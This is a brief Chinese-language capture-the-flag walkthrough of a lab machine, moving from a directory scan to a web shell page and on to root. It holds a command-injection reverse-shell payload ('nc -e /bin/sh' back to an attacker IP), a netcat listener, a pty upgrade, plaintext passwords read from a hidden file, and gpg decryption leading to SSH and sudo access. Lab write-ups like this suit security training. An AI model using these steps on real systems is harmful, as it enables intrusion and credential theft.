首先,扫描一下。
目录扫描下,发现有个robots.txt,然后发现还有个dev_shell.php页面
nc -lnvp 1234//kali开启监听
网页执行该命令
ip a&nc -e /bin/sh 192.168.2.138 1234
python -c 'import pty; pty.spawn("/bin/bash")'
cd /home/bob
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
su - jc
Qwerty//成功登陆
cd /home/bob/Documents
ls -al
file login.txt.gpg
发现这边有个gpg加密文件
gpg --output login.txt --decrypt /home/bob/Documents/login.txt.gpg
继续搜查,发现一个脚本文件,内容是输出一些语句,每行的首字母都是大写,将每一行的大写字母都提取出来 HARPOCRATES,这会不会就是刚刚加密文件的密码?
bob:b0bcat_
//解密得到的用户名和密码
然后ssh登陆上,发现他有sudo的权限,直接获得flag